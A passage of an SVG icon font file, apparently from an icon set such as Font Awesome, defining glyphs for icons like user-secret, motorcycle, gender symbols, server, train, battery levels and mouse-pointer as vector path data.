c-16.918 16.9189 -9.91699 45.7793 12.8359 53.0918l41.792 13.4336v140.102c0 17.6729 14.3271 32 32 32h64v40c0 13.2549 10.7451 24 24 24h144c13.2549 0 24 -10.7451 24 -24v-40h64c17.6729 0 32 -14.3271 32 -32v-140.102l41.792 -13.4336
c22.7783 -7.32129 29.7354 -36.1914 12.8359 -53.0918zM192 320v-87.5312l118.208 37.9951c2.63574 0.847656 7.02344 1.53516 9.79199 1.53516s7.15625 -0.6875 9.79199 -1.53516l118.208 -37.9951v87.5312h-256z" />
    <glyph glyph-name="user-secret" unicode="&#xf21b;" horiz-adv-x="448" 
d="M383.9 139.7c38.2998 -23.7002 64.0996 -65.7002 64.0996 -114.101v-44.7998c0 -24.7002 -20.0996 -44.7998 -44.7998 -44.7998h-358.4c-24.7002 0 -44.7998 20.0996 -44.7998 44.7998v44.7998c0 49.7002 27.2998 92.6006 67.4004 115.9l-25.8008 60.2002
c-4.5 10.5996 3.2002 22.2998 14.7002 22.2998h57.5c-11 18.9004 -17.7998 40.5996 -17.7998 64v0.299805c-39.2002 7.7998 -64 19.1006 -64 31.7002c0 13.2998 27.2998 25.0996 70 33c9.2002 32.7998 27.0996 65.7998 40.5996 82.7998
c9.5 11.9004 25.9004 15.6006 39.5 8.7998l27.6006 -13.7998c9 -4.5 19.5996 -4.5 28.5996 0l27.6006 13.7998c13.5996 6.80078 30 3.10059 39.5 -8.7998c13.5996 -17 31.3994 -50 40.5996 -82.7998c42.7998 -7.90039 70.0996 -19.7002 70.0996 -33
c0 -12.5996 -24.7998 -23.9004 -64 -31.7002v-0.299805c0 -23.4004 -6.7998 -45.0996 -17.7998 -64h58.5c11.2998 0 19 -11.2002 15 -21.7002zM176 -32l32 120l-24 40l-49.5996 32zM272 -32l41.5996 192l-49.5996 -32l-24 -40zM313.7 266.5
c0.799805 2.59961 6.2998 5.7002 6.39941 5.7998v10.7998c-28.2998 -3.69922 -61 -5.7998 -96 -5.7998s-67.6992 2.2002 -96 5.7998v-10.7998c0 -0.0996094 5.5 -3.2998 6.30078 -5.7998c3.7998 -11.9004 7 -24.5996 16.5 -33.4004c8 -7.39941 47 -25.1992 64 25
c2.89941 8.40039 15.5 8.40039 18.2998 0c16 -47.3994 53.8994 -34.2998 64 -25c9.5 8.80078 12.5996 21.5 16.5 33.4004z" />
    <glyph glyph-name="motorcycle" unicode="&#xf21c;" horiz-adv-x="640" 
d="M512.9 256c69.5996 -0.5 126.5 -57.2998 127.199 -126.9c0.600586 -71.5996 -57.5996 -129.8 -129.199 -129.1c-69.6006 0.599609 -126.301 57.5 -126.801 127.1c-0.299805 39.3008 17.2002 74.5 44.8008 98.2002l-12.5 20.7998
c-38.7002 -31.2998 -58.3008 -77.8994 -56.2002 -125c0.599609 -13.6992 -10.2998 -25.0996 -24 -25.0996h-84.2002c-14.2998 -55.2002 -64.4004 -96 -124 -96c-71.7002 0 -129.6 58.9004 -128 131c1.59961 67.4004 55.9004 122.5 123.2 124.9
c14.3994 0.5 28.2998 -1.30078 41.2998 -5.2002l11.2998 20.5c-9.09961 13.8994 -23.2998 24.7998 -47.7998 24.7998h-56c-13.0996 0 -23.7998 10.5 -24 23.5c-0.299805 13.5 11 24.5 24.5 24.5h55.5c55 0 82.2002 -16.9004 99.9004 -40h153.699l-19.1992 32h-66.4004
c-8.7998 0 -16 7.2002 -16 16v16c0 8.7998 7.2002 16 16 16h80c8.40039 0 16.2002 -4.40039 20.5996 -11.5996l22.8008 -38l37.5 41.6992c4.5 5 11 7.90039 17.7998 7.90039h45.2998c13.2998 0 24 -10.7002 24 -24v-32c0 -13.2998 -10.7002 -24 -24 -24h-82.4004
l32.9004 -54.9004c13.2998 4.60059 27.5 7 42.4004 6.90039zM128 48c32.7002 0 60.9004 19.7998 73.2998 48h-81.2998c-18.2002 0 -29.7998 19.5996 -21 35.5996l41.5 75.4004c-4.09961 0.700195 -8.2998 1 -12.5 1c-44.0996 0 -80 -35.9004 -80 -80s35.9004 -80 80 -80z
M591.9 123.6c2.39941 46.1006 -34.3008 84.4004 -79.9004 84.3008c-5.40039 0 -10.7002 -0.5 -15.9004 -1.60059l48.6006 -80.8994c4.5 -7.60059 2.09961 -17.5 -5.5 -22l-13.7002 -8.2002c-7.59961 -4.5 -17.5 -2.10059 -22 5.5l-49.4004 82.3994
c-13.6992 -14.2998 -22.0996 -33.6992 -22.0996 -55.0996c0 -45.5996 38.2998 -82.4004 84.4004 -79.9004c40.5 2.10059 73.2998 34.9004 75.5 75.5z" />
    <glyph glyph-name="street-view" unicode="&#xf21d;" 
d="M367.9 118.24c85.2295 -15.5801 144.1 -48.29 144.1 -86.2402c0 -53.0195 -114.62 -96 -256 -96s-256 42.9805 -256 96c0 37.9502 58.8701 70.6602 144.1 86.2402c4.62012 -5.2998 9.78027 -10.1006 15.9004 -13.6504v-22.9395
c-66.5195 -9.35059 -112 -28.0508 -112 -49.6504c0 -30.9297 93.1201 -56 208 -56s208 25.0703 208 56c0 21.5996 -45.4805 40.3096 -112 49.6504v22.9395c6.12012 3.5498 11.2803 8.35059 15.9004 13.6504zM256 320c-35.3496 0 -64 28.6504 -64 64s28.6504 64 64 64
s64 -28.6504 64 -64s-28.6504 -64 -64 -64zM192 128c-17.6699 0 -32 14.3301 -32 32v96c0 26.5098 21.4902 48 48 48h11.7998c11.0703 -5.03027 23.2598 -8 36.2002 -8s25.1299 2.96973 36.2002 8h11.7998c26.5098 0 48 -21.4902 48 -48v-96
c0 -17.6699 -14.3301 -32 -32 -32v-96c0 -17.6699 -14.3301 -32 -32 -32h-64c-17.6699 0 -32 14.3301 -32 32v96z" />
    <glyph glyph-name="heartbeat" unicode="&#xf21e;" 
d="M320.2 204.2l22.0996 -44.2002h109.101l-182.601 -186.5c-7.09961 -7.2998 -18.5996 -7.2998 -25.7002 0l-182.5 186.5h94.1006l30 71.7002l56.8994 -126.3c5.5 -12.3008 22.9004 -12.7002 28.9004 -0.600586zM473.7 374.1
c48.7002 -49.7998 50.7998 -129.1 7.2998 -182.1h-118.9l-27.5996 55.2002c-5.90039 11.7998 -22.7002 11.7998 -28.5996 0l-49 -97.9004l-58.2002 129.3c-5.7998 12.8008 -24 12.5 -29.4004 -0.399414l-35.8994 -86.2002h-102.4c-43.5 53 -41.4004 132.3 7.2998 182.1
l2.40039 2.40039c51.5 52.7002 135.899 52.7002 187.399 0l27.9004 -28.5l27.9004 28.5996c51.5996 52.6006 135.899 52.6006 187.399 0z" />
    <glyph glyph-name="venus" unicode="&#xf221;" horiz-adv-x="288" 
d="M288 272c0 -68.5 -47.9004 -125.9 -112 -140.4v-51.5996h36c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-36v-36c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v36h-36c-6.59961 0 -12 5.40039 -12 12v40
c0 6.59961 5.40039 12 12 12h36v51.5996c-64.0996 14.5 -112 71.9004 -112 140.4c0 79.5 64.5 144 144 144s144 -64.5 144 -144zM64 272c0 -44.0996 35.9004 -80 80 -80s80 35.9004 80 80s-35.9004 80 -80 80s-80 -35.9004 -80 -80z" />
    <glyph glyph-name="mars" unicode="&#xf222;" horiz-adv-x="384" 
d="M372 384c6.59961 0 12 -5.40039 12 -12v-79c0 -10.7002 -12.9004 -16.0996 -20.5 -8.5l-16.9004 16.9004l-80.6992 -80.7002c14 -22.2002 22.0996 -48.5 22.0996 -76.7002c0 -79.5 -64.5 -144 -144 -144s-144 64.5 -144 144s64.5 144 144 144
c28.2002 0 54.5 -8.09961 76.7002 -22.0996l80.7002 80.6992l-16.9004 16.9004c-7.5 7.59961 -2.2002 20.5 8.5 20.5h79zM144 64c44.0996 0 80 35.9004 80 80s-35.9004 80 -80 80s-80 -35.9004 -80 -80s35.9004 -80 80 -80z" />
    <glyph glyph-name="mercury" unicode="&#xf223;" horiz-adv-x="288" 
d="M288 240c0 -68.5 -47.9004 -125.9 -112 -140.4v-51.5996h36c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-36v-36c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v36h-36c-6.59961 0 -12 5.40039 -12 12v40
c0 6.59961 5.40039 12 12 12h36v51.5996c-64.0996 14.5 -112 71.9004 -112 140.4c0 44.2002 19.9004 83.7002 51.2002 110c-2.5 1.90039 -4.90039 3.7998 -7.2002 5.7998c-24.7998 21.2002 -39.7998 48.7998 -43.2002 78.9004
c-0.899414 7.09961 4.7002 13.2998 11.9004 13.2998h40.5c5.7002 0 10.5996 -4.09961 11.7002 -9.7998c2.5 -12.5 9.59961 -24.2998 20.6992 -33.7998c15.4004 -13.2002 36.1006 -20.4004 58.4004 -20.4004s43 7.2002 58.2998 20.4004
c11.1006 9.5 18.2998 21.2998 20.7002 33.7998c1.09961 5.7002 6 9.7998 11.7998 9.7998h40.5c7.2002 0 12.7998 -6.2002 11.9004 -13.2998c-3.40039 -30 -18.5 -57.6006 -43.2002 -78.7998c-2.2998 -2 -4.7002 -4 -7.2002 -5.80078
c31.2998 -26.3994 51.2002 -65.8994 51.2002 -110.1zM64 240c0 -44.0996 35.9004 -80 80 -80s80 35.9004 80 80s-35.9004 80 -80 80s-80 -35.9004 -80 -80z" />
    <glyph glyph-name="transgender" unicode="&#xf224;" horiz-adv-x="384" 
d="M372 448c6.59961 0 12 -5.40039 12 -12v-79c0 -10.7002 -12.9004 -16.0996 -20.5 -8.5l-16.9004 16.9004l-80.6992 -80.7002c14 -22.2002 22.0996 -48.5 22.0996 -76.7002c0 -68.5 -47.9004 -125.8 -112 -140.4v-27.5996h36c6.59961 0 12 -5.40039 12 -12v-40
c0 -6.59961 -5.40039 -12 -12 -12h-36v-28c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v28h-36c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h36v27.5996c-64.0996 14.5 -112 71.9004 -112 140.4c0 79.5 64.5 144 144 144
c28.2002 0 54.5 -8.09961 76.7002 -22.0996l80.7002 80.6992l-16.9004 16.9004c-7.5 7.59961 -2.2002 20.5 8.5 20.5h79zM144 128c44.0996 0 80 35.9004 80 80s-35.9004 80 -80 80s-80 -35.9004 -80 -80s35.9004 -80 80 -80z" />
    <glyph glyph-name="transgender-alt" unicode="&#xf225;" horiz-adv-x="480" 
d="M468 448c6.59961 0 12 -5.40039 12 -12v-79c0 -10.7002 -12.9004 -16.0996 -20.5 -8.5l-16.9004 16.9004l-80.6992 -80.7002c14 -22.2002 22.0996 -48.5 22.0996 -76.7002c0 -68.5 -47.9004 -125.8 -112 -140.4v-27.5996h36c6.59961 0 12 -5.40039 12 -12v-40
c0 -6.59961 -5.40039 -12 -12 -12h-36v-28c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v28h-36c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h36v27.5996c-64.0996 14.5 -112 71.9004 -112 140.4
c0 28.2002 8.09961 54.5 22.2002 76.5996l-16.5 16.5l-19.7998 -19.7998c-4.7002 -4.7002 -12.3008 -4.7002 -17 0l-28.3008 28.2998c-4.69922 4.7002 -4.69922 12.3008 0 17l19.8008 19.8008l-19 19l-16.9004 -16.9004c-7.59961 -7.5 -20.5 -2.2002 -20.5 8.5v79
c0 6.59961 5.40039 12 12 12h79c10.7002 0 16.0996 -12.9004 8.40039 -20.4004l-16.9004 -16.8994l19 -19l19.7998 19.7998c4.7002 4.7002 12.2998 4.7002 17 0l28.2998 -28.2998c4.7002 -4.7002 4.7002 -12.2998 0 -17l-19.7998 -19.7998l16.5 -16.5
c22.2002 14 48.5 22.0996 76.7002 22.0996s54.5 -8.09961 76.7002 -22.0996l80.7002 80.6992l-16.9004 16.9004c-7.5 7.59961 -2.2002 20.5 8.5 20.5h79zM240 128c44.0996 0 80 35.9004 80 80s-35.9004 80 -80 80s-80 -35.9004 -80 -80s35.9004 -80 80 -80z" />
    <glyph glyph-name="venus-double" unicode="&#xf226;" 
d="M288 272c0 -68.5 -47.9004 -125.9 -112 -140.4v-51.5996h36c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-36v-36c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v36h-36c-6.59961 0 -12 5.40039 -12 12v40
c0 6.59961 5.40039 12 12 12h36v51.5996c-64.0996 14.5 -112 71.9004 -112 140.4c0 79.5 64.5 144 144 144s144 -64.5 144 -144zM64 272c0 -44.0996 35.9004 -80 80 -80s80 35.9004 80 80s-35.9004 80 -80 80s-80 -35.9004 -80 -80zM400 131.6v-51.5996h36
c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-36v-36c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v36h-36c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h36v51.5996
c-21.2002 4.80078 -40.5996 14.3008 -57.2002 27.3008c14 16.6992 25 36 32.1006 57.0996c14.5 -14.7998 34.6992 -24 57.0996 -24c44.0996 0 80 35.9004 80 80s-35.9004 80 -80 80c-22.2998 0 -42.5996 -9.2002 -57.0996 -24
c-7.10059 21.0996 -18 40.4004 -32.1006 57.0996c24.6006 19.3008 55.5 30.9004 89.2002 30.9004c79.5 0 144 -64.5 144 -144c0 -68.5 -47.9004 -125.9 -112 -140.4z" />
    <glyph glyph-name="mars-double" unicode="&#xf227;" 
d="M340 448c6.59961 0 12 -5.40039 12 -12v-79c0 -7.2002 -5.90039 -12 -12.0996 -12c-2.90039 0 -6 1.09961 -8.40039 3.5l-16.9004 16.9004l-48.6992 -48.7002c14 -22.2002 22.0996 -48.5 22.0996 -76.7002c0 -79.5 -64.5 -144 -144 -144s-144 64.5 -144 144
s64.5 144 144 144c28.2002 0 54.5 -8.09961 76.7002 -22.0996l48.7002 48.6992l-16.9004 16.9004c-7.5 7.59961 -2.2002 20.5 8.5 20.5h79zM144 160c44.0996 0 80 35.9004 80 80s-35.9004 80 -80 80s-80 -35.9004 -80 -80s35.9004 -80 80 -80zM500 288.1
c6.59961 0 12 -5.39941 12 -12.0996v-79c0 -7.2002 -5.90039 -12 -12.0996 -12c-3 0 -6 1.09961 -8.40039 3.5l-16.9004 16.9004l-48.6992 -48.7002c14 -22.2002 22.0996 -48.5 22.0996 -76.7002c0 -79.5 -64.5 -144 -144 -144c-74.4004 0 -135.6 56.4004 -143.2 128.9
c21.7998 2 43.2998 8.19922 63.2998 18.3994c-0.0996094 -1 -0.0996094 -2.09961 -0.0996094 -3.2002c0 -44.0996 35.9004 -80 80 -80s80 35.9004 80 80c0 44.1006 -35.9004 80 -80 80c-1 0 -2.09961 -0.0996094 -3.2002 -0.0996094
c10.2002 20 16.2998 41.5 18.4004 63.2998c22.5 -2.39941 43.2998 -9.89941 61.5 -21.2998l48.7002 48.7002l-16.9004 16.8994c-7.5 7.60059 -2.2002 20.5 8.5 20.5h79z" />
    <glyph glyph-name="venus-mars" unicode="&#xf228;" horiz-adv-x="576" 
d="M564 448c6.59961 0 12 -5.40039 12 -12v-79c0 -7.2002 -5.90039 -12 -12.0996 -12c-3 0 -6 1.09961 -8.40039 3.5l-16.9004 16.9004l-48.6992 -48.7002c14 -22.2002 22.0996 -48.5 22.0996 -76.7002c0 -79.5 -64.5 -144 -144 -144
c-33.7002 0 -64.7002 11.5 -89.2002 30.9004c14.1006 16.6992 25 36 32.1006 57.0996c14.5 -14.7998 34.7998 -24 57.0996 -24c44.0996 0 80 35.9004 80 80s-35.9004 80 -80 80c-22.4004 0 -42.5996 -9.2002 -57.0996 -24
c-7.10059 21.0996 -18.1006 40.4004 -32.1006 57.0996c24.6006 19.3008 55.5 30.9004 89.2002 30.9004c28.2002 0 54.5 -8.09961 76.7002 -22.0996l48.7002 48.6992l-16.9004 16.9004c-7.5 7.59961 -2.2002 20.5 8.5 20.5h79zM144 384c79.5 0 144 -64.5 144 -144
c0 -68.5 -47.9004 -125.8 -112 -140.4v-51.5996h36c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-36v-36c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v36h-36c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12
h36v51.5996c-64.0996 14.5 -112 71.9004 -112 140.4c0 79.5 64.5 144 144 144zM144 160c44.0996 0 80 35.9004 80 80s-35.9004 80 -80 80s-80 -35.9004 -80 -80s35.9004 -80 80 -80z" />
    <glyph glyph-name="mars-stroke" unicode="&#xf229;" horiz-adv-x="384" 
d="M372 384c6.59961 0 12 -5.40039 12.0996 -12v-78.9004c0 -10.6992 -12.8994 -16.0996 -20.5 -8.5l-16.8994 16.9004l-17.5 -17.5l14.0996 -14.0996c4.7002 -4.7002 4.7002 -12.3008 0 -17l-28.2998 -28.3008c-4.7002 -4.69922 -12.2998 -4.69922 -17 0l-14.0996 14.1006
l-18 -18c14 -22.2002 22.0996 -48.5 22.0996 -76.7002c0 -79.5 -64.5 -144 -144 -144s-144 64.5 -144 144s64.5 144 143.9 144c28.1992 0 54.5 -8.09961 76.6992 -22.0996l18 18l-14.0996 14.0996c-4.7002 4.7002 -4.7002 12.2998 0 17l28.2998 28.2002
c4.7002 4.7002 12.2998 4.7002 17 0l14.1006 -14.1006l17.5 17.5l-16.9004 16.9004c-7.5 7.59961 -2.2002 20.5 8.5 20.5h79zM144 64c44.0996 0 80 35.9004 80 80s-35.9004 80 -80 80s-80 -35.9004 -80 -80s35.9004 -80 80 -80z" />
    <glyph glyph-name="mars-stroke-v" unicode="&#xf22a;" horiz-adv-x="288" 
d="M245.8 213.8c56.2998 -56.2002 56.2998 -147.399 0 -203.6c-56.2002 -56.2002 -147.399 -56.2002 -203.6 0s-56.2002 147.399 0 203.6c19.8994 19.9004 44.2002 32.7998 69.7998 38.6006v25.3994h-20c-6.59961 0 -12 5.40039 -12 12v40c0 6.60059 5.40039 12 12 12h20
v24.7002h-23.9004c-10.6992 0 -16.0996 12.9004 -8.5 20.5l55.9004 55.9004c4.7002 4.69922 12.2998 4.69922 17 0l55.9004 -55.8008c7.5 -7.59961 2.19922 -20.5 -8.5 -20.5h-23.9004v-24.7998h20c6.59961 0 12 -5.39941 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-20
v-25.3994c25.5996 -5.80078 49.9004 -18.7002 69.7998 -38.6006zM200.6 55.4004c31.2002 31.1992 31.2002 82 0 113.1c-31.1992 31.2002 -81.8994 31.2002 -113.1 0s-31.2002 -81.9004 0 -113.1c31.2002 -31.2002 81.9004 -31.2002 113.1 0z" />
    <glyph glyph-name="mars-stroke-h" unicode="&#xf22b;" horiz-adv-x="479" 
d="M476.2 200.5c4.7002 -4.7002 4.7002 -12.2998 0.0996094 -17l-55.8994 -55.9004c-7.60059 -7.5 -20.5 -2.19922 -20.5 8.5v23.9004h-23.9004v-20c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v20h-27.5996
c-5.80078 -25.5996 -18.7002 -49.9004 -38.6006 -69.7998c-56.2002 -56.2002 -147.399 -56.2002 -203.6 0s-56.2002 147.399 0 203.6s147.399 56.2002 203.6 0c19.9004 -19.8994 32.7998 -44.2002 38.6006 -69.7998h27.5996v20c0 6.59961 5.40039 12 12 12h40
c6.59961 0 12 -5.40039 12 -12v-20h23.7998v23.9004c0 10.6992 12.9004 16.0996 20.5 8.5zM200.6 135.4c31.2002 31.1992 31.2002 82 0 113.1c-31.1992 31.2002 -81.8994 31.2002 -113.1 0s-31.2002 -81.9004 0 -113.1c31.2002 -31.2002 81.9004 -31.2002 113.1 0z" />
    <glyph glyph-name="neuter" unicode="&#xf22c;" horiz-adv-x="288" 
d="M288 272c0 -68.5 -47.9004 -125.9 -112 -140.4v-151.6c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v151.6c-64.0996 14.5 -112 71.9004 -112 140.4c0 79.5 64.5 144 144 144s144 -64.5 144 -144zM144 192c44.0996 0 80 35.9004 80 80
s-35.9004 80 -80 80s-80 -35.9004 -80 -80s35.9004 -80 80 -80z" />
    <glyph glyph-name="genderless" unicode="&#xf22d;" horiz-adv-x="288" 
d="M144 272c-44.0996 0 -80 -35.9004 -80 -80s35.9004 -80 80 -80s80 35.9004 80 80s-35.9004 80 -80 80zM144 336c79.5 0 144 -64.5 144 -144s-64.5 -144 -144 -144s-144 64.5 -144 144s64.5 144 144 144z" />
    <glyph glyph-name="server" unicode="&#xf233;" 
d="M480 288h-448c-17.6729 0 -32 14.3271 -32 32v64c0 17.6729 14.3271 32 32 32h448c17.6729 0 32 -14.3271 32 -32v-64c0 -17.6729 -14.3271 -32 -32 -32zM432 376c-13.2549 0 -24 -10.7451 -24 -24s10.7451 -24 24 -24s24 10.7451 24 24s-10.7451 24 -24 24zM368 376
c-13.2549 0 -24 -10.7451 -24 -24s10.7451 -24 24 -24s24 10.7451 24 24s-10.7451 24 -24 24zM480 128h-448c-17.6729 0 -32 14.3271 -32 32v64c0 17.6729 14.3271 32 32 32h448c17.6729 0 32 -14.3271 32 -32v-64c0 -17.6729 -14.3271 -32 -32 -32zM432 216
c-13.2549 0 -24 -10.7451 -24 -24s10.7451 -24 24 -24s24 10.7451 24 24s-10.7451 24 -24 24zM368 216c-13.2549 0 -24 -10.7451 -24 -24s10.7451 -24 24 -24s24 10.7451 24 24s-10.7451 24 -24 24zM480 -32h-448c-17.6729 0 -32 14.3271 -32 32v64
c0 17.6729 14.3271 32 32 32h448c17.6729 0 32 -14.3271 32 -32v-64c0 -17.6729 -14.3271 -32 -32 -32zM432 56c-13.2549 0 -24 -10.7451 -24 -24s10.7451 -24 24 -24s24 10.7451 24 24s-10.7451 24 -24 24zM368 56c-13.2549 0 -24 -10.7451 -24 -24s10.7451 -24 24 -24
s24 10.7451 24 24s-10.7451 24 -24 24z" />
    <glyph glyph-name="user-plus" unicode="&#xf234;" horiz-adv-x="640" 
d="M624 240c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-64v-64c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v64h-64c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h64v64c0 8.7998 7.2002 16 16 16h32
c8.7998 0 16 -7.2002 16 -16v-64h64zM224 192c-70.7002 0 -128 57.2998 -128 128s57.2998 128 128 128s128 -57.2998 128 -128s-57.2998 -128 -128 -128zM313.6 160c74.2002 0 134.4 -60.2002 134.4 -134.4v-41.5996c0 -26.5 -21.5 -48 -48 -48h-352
c-26.5 0 -48 21.5 -48 48v41.5996c0 74.2002 60.2002 134.4 134.4 134.4h16.6992c22.3008 -10.2002 46.9004 -16 72.9004 -16s50.7002 5.7998 72.9004 16h16.6992z" />
    <glyph glyph-name="user-times" unicode="&#xf235;" horiz-adv-x="639" 
d="M589.6 208l45.6006 -45.5996c6.2998 -6.30078 6.2998 -16.5 0 -22.8008l-22.7998 -22.7998c-6.30078 -6.2998 -16.5 -6.2998 -22.8008 0l-45.5996 45.6006l-45.5996 -45.6006c-6.30078 -6.2998 -16.5 -6.2998 -22.8008 0l-22.7998 22.7998
c-6.2998 6.30078 -6.2998 16.5 0 22.8008l45.6006 45.5996l-45.6006 45.5996c-6.2998 6.30078 -6.2998 16.5 0 22.8008l22.7998 22.7998c6.30078 6.2998 16.5 6.2998 22.8008 0l45.5996 -45.6006l45.5996 45.6006c6.30078 6.2998 16.5 6.2998 22.8008 0l22.7998 -22.7998
c6.2998 -6.30078 6.2998 -16.5 0 -22.8008zM224 192c-70.7002 0 -128 57.2998 -128 128s57.2998 128 128 128s128 -57.2998 128 -128s-57.2998 -128 -128 -128zM313.6 160c74.2002 0 134.4 -60.2002 134.4 -134.4v-41.5996c0 -26.5 -21.5 -48 -48 -48h-352
c-26.5 0 -48 21.5 -48 48v41.5996c0 74.2002 60.2002 134.4 134.4 134.4h16.6992c22.3008 -10.2002 46.9004 -16 72.9004 -16s50.7002 5.7998 72.9004 16h16.6992z" />
    <glyph glyph-name="bed" unicode="&#xf236;" horiz-adv-x="640" 
d="M176 192c-44.1104 0 -80 35.8896 -80 80s35.8896 80 80 80s80 -35.8896 80 -80s-35.8896 -80 -80 -80zM528 320c61.8604 0 112 -50.1396 112 -112v-192c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16v48h-512v-48c0 -8.83984 -7.16016 -16 -16 -16
h-32c-8.83984 0 -16 7.16016 -16 16v352c0 8.83984 7.16016 16 16 16h32c8.83984 0 16 -7.16016 16 -16v-208h224v144c0 8.83984 7.16016 16 16 16h224z" />
    <glyph glyph-name="train" unicode="&#xf238;" horiz-adv-x="448" 
d="M448 352v-256c0 -51.8154 -61.624 -96 -130.022 -96l62.9805 -49.7207c5.94727 -4.69629 2.60352 -14.2793 -4.95801 -14.2793h-304c-7.57812 0 -10.8916 9.59375 -4.95703 14.2793l62.9795 49.7207c-68.2021 0 -130.022 44.0459 -130.022 96v256c0 53.0186 64 96 128 96
h192c65 0 128 -42.9814 128 -96zM400 216v112c0 13.2549 -10.7451 24 -24 24h-304c-13.2549 0 -24 -10.7451 -24 -24v-112c0 -13.2549 10.7451 -24 24 -24h304c13.2549 0 24 10.7451 24 24zM224 152c-30.9277 0 -56 -25.0723 -56 -56s25.0723 -56 56 -56s56 25.0723 56 56
s-25.0723 56 -56 56z" />
    <glyph glyph-name="subway" unicode="&#xf239;" horiz-adv-x="448" 
d="M448 352v-256c0 -51.8154 -61.624 -96 -130.022 -96l62.9805 -49.7207c5.94727 -4.69629 2.60352 -14.2793 -4.95801 -14.2793h-304c-7.57812 0 -10.8916 9.59375 -4.95703 14.2793l62.9795 49.7207c-68.2021 0 -130.022 44.0459 -130.022 96v256c0 53.0186 64 96 128 96
h192c65 0 128 -42.9814 128 -96zM200 216v112c0 13.2549 -10.7451 24 -24 24h-104c-13.2549 0 -24 -10.7451 -24 -24v-112c0 -13.2549 10.7451 -24 24 -24h104c13.2549 0 24 10.7451 24 24zM400 216v112c0 13.2549 -10.7451 24 -24 24h-104c-13.2549 0 -24 -10.7451 -24 -24
v-112c0 -13.2549 10.7451 -24 24 -24h104c13.2549 0 24 10.7451 24 24zM352 160c-26.5098 0 -48 -21.4902 -48 -48s21.4902 -48 48 -48s48 21.4902 48 48s-21.4902 48 -48 48zM96 160c-26.5098 0 -48 -21.4902 -48 -48s21.4902 -48 48 -48s48 21.4902 48 48
s-21.4902 48 -48 48z" />
    <glyph glyph-name="battery-full" unicode="&#xf240;" horiz-adv-x="640" 
d="M544 288h-480v-192h480v64h32v64h-32v64zM560 352c26.5098 0 48 -21.4902 48 -48v-16h8c13.2549 0 24 -10.7451 24 -24v-144c0 -13.2549 -10.7451 -24 -24 -24h-8v-16c0 -26.5098 -21.4902 -48 -48 -48h-512c-26.5098 0 -48 21.4902 -48 48v224
c0 26.5098 21.4902 48 48 48h512zM512 256v-128h-416v128h416z" />
    <glyph glyph-name="battery-three-quarters" unicode="&#xf241;" horiz-adv-x="640" 
d="M544 288h-480v-192h480v64h32v64h-32v64zM560 352c26.5098 0 48 -21.4902 48 -48v-16h8c13.2549 0 24 -10.7451 24 -24v-144c0 -13.2549 -10.7451 -24 -24 -24h-8v-16c0 -26.5098 -21.4902 -48 -48 -48h-512c-26.5098 0 -48 21.4902 -48 48v224
c0 26.5098 21.4902 48 48 48h512zM416 256v-128h-320v128h320z" />
    <glyph glyph-name="battery-half" unicode="&#xf242;" horiz-adv-x="640" 
d="M544 288h-480v-192h480v64h32v64h-32v64zM560 352c26.5098 0 48 -21.4902 48 -48v-16h8c13.2549 0 24 -10.7451 24 -24v-144c0 -13.2549 -10.7451 -24 -24 -24h-8v-16c0 -26.5098 -21.4902 -48 -48 -48h-512c-26.5098 0 -48 21.4902 -48 48v224
c0 26.5098 21.4902 48 48 48h512zM320 256v-128h-224v128h224z" />
    <glyph glyph-name="battery-quarter" unicode="&#xf243;" horiz-adv-x="640" 
d="M544 288h-480v-192h480v64h32v64h-32v64zM560 352c26.5098 0 48 -21.4902 48 -48v-16h8c13.2549 0 24 -10.7451 24 -24v-144c0 -13.2549 -10.7451 -24 -24 -24h-8v-16c0 -26.5098 -21.4902 -48 -48 -48h-512c-26.5098 0 -48 21.4902 -48 48v224
c0 26.5098 21.4902 48 48 48h512zM224 256v-128h-128v128h128z" />
    <glyph glyph-name="battery-empty" unicode="&#xf244;" horiz-adv-x="640" 
d="M544 288h-480v-192h480v64h32v64h-32v64zM560 352c26.5098 0 48 -21.4902 48 -48v-16h8c13.2549 0 24 -10.7451 24 -24v-144c0 -13.2549 -10.7451 -24 -24 -24h-8v-16c0 -26.5098 -21.4902 -48 -48 -48h-512c-26.5098 0 -48 21.4902 -48 48v224
c0 26.5098 21.4902 48 48 48h512z" />
    <glyph glyph-name="mouse-pointer" unicode="&#xf245;" horiz-adv-x="320" 
d="M302.189 118.874h-106.084l55.8301 -135.993c3.88965 -9.42773 -0.554688 -19.999 -9.44336 -23.999l-49.165 -21.4268c-9.16504 -4 -19.4434 0.571289 -23.332 9.71387l-53.0527 129.136l-86.6641 -89.1377c-11.5498 -11.877 -30.2783 -2.7207 -30.2783 12.8564v429.678
c0 16.3994 19.9209 24.3945 30.2773 12.8555l284.412 -292.542c11.4717 -11.1787 3.00684 -31.1406 -12.5 -31.1406z" />
